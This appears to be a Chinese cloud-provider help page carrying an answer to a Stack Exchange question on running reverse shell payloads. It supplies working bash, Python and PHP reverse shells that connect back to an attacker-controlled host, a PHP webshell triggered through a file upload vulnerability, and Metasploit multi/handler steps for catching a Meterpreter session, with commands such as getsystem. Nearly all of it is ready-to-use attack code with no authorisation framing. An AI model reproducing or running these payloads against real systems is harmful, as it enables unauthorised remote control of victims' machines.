You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

如何执行反向Shell Payload?Metasploit Meterpreter场景下Payload执行咨询

Alright, let's break down your questions clearly—first covering how to run a reverse shell payload in general, then diving into getting that Meterpreter shell up and running via Metasploit after uploading your payload.

通用反向Shell Payload执行方法

The way you execute a reverse shell depends entirely on the access you have to the target system and what tools/languages are available there:

  • Direct command line execution
    If you already have command line access (via SSH, RCE, etc.), just paste the payload command matching the target OS and run it. For example, a common bash payload for Linux:

    bash -i >& /dev/tcp/[YOUR_LOCAL_IP]/[YOUR_LISTEN_PORT] 0>&1
    

    Before running this, make sure you're listening on your local machine with nc -lvnp [YOUR_LISTEN_PORT]—once the payload runs, you'll get a shell session.

  • Script-based execution
    If the target allows running scripts (Python, PHP, etc.), save the payload as a script file and execute it with the appropriate interpreter. For a Python reverse shell:

    import socket, subprocess, os
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("[YOUR_LOCAL_IP]", [YOUR_LISTEN_PORT]))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    subprocess.call(["/bin/sh", "-i"])
    

    Save this as rev_shell.py, then run it on the target with python rev_shell.py.

  • Web application trigger
    If you uploaded a payload via a file upload vulnerability (like a PHP webshell), trigger it by accessing the file's URL in a browser or via curl. For example, a PHP payload:

    <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[YOUR_LOCAL_IP]/[YOUR_LISTEN_PORT] 0>&1'"); ?>
    

    Upload this as rev_shell.php, then hit http://target-ip/rev_shell.php to kick off the reverse connection.

Metasploit Meterpreter Reverse Shell Execution Steps

Once you've uploaded the Metasploit-generated payload to the target, follow these steps to get the Meterpreter shell working:

  1. Set up the listener in Metasploit
    Open msfconsole on your local machine and configure the handler to match the payload you generated:

    use exploit/multi/handler
    set PAYLOAD [YOUR_PAYLOAD_TYPE]  # e.g., linux/x64/meterpreter/reverse_tcp or windows/x64/meterpreter/reverse_tcp
    set LHOST [YOUR_LOCAL_IP]
    set LPORT [YOUR_LISTEN_PORT]
    run
    

    Metasploit will now sit and wait for the target to connect.

  2. Execute the payload on the target
    How you run the payload depends on its type:

    • Executable files (e.g., .bin for Linux, .exe for Windows): Run it directly via the target's command line (./payload.bin on Linux) or double-click it if you have GUI access on Windows.
    • Script payloads (e.g., PHP, Python): Use the target's interpreter to run the file—php payload.php or python payload.py.
    • Web-based payloads: Access the uploaded file's URL (e.g., http://target-ip/payload.aspx) to trigger execution.
  3. Establish the Meterpreter session
    As soon as the payload runs on the target, your local Metasploit listener will catch the connection, and you'll be dropped into a Meterpreter shell. From here, you can use commands like sysinfo, upload, download, or getsystem to interact with the target.

Quick Notes to Avoid Headaches

  • Make sure your local IP is reachable by the target (use a public IP if you're across networks, or set up port forwarding).
  • Check that the target's firewall/security group allows outbound connections to your listen port.
  • Always generate a payload that matches the target's OS and architecture (x86 vs x64)—a 64-bit payload won't run on a 32-bit system!

内容的提问来源于stack exchange,提问作者user2609980

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.05.19 03:39:42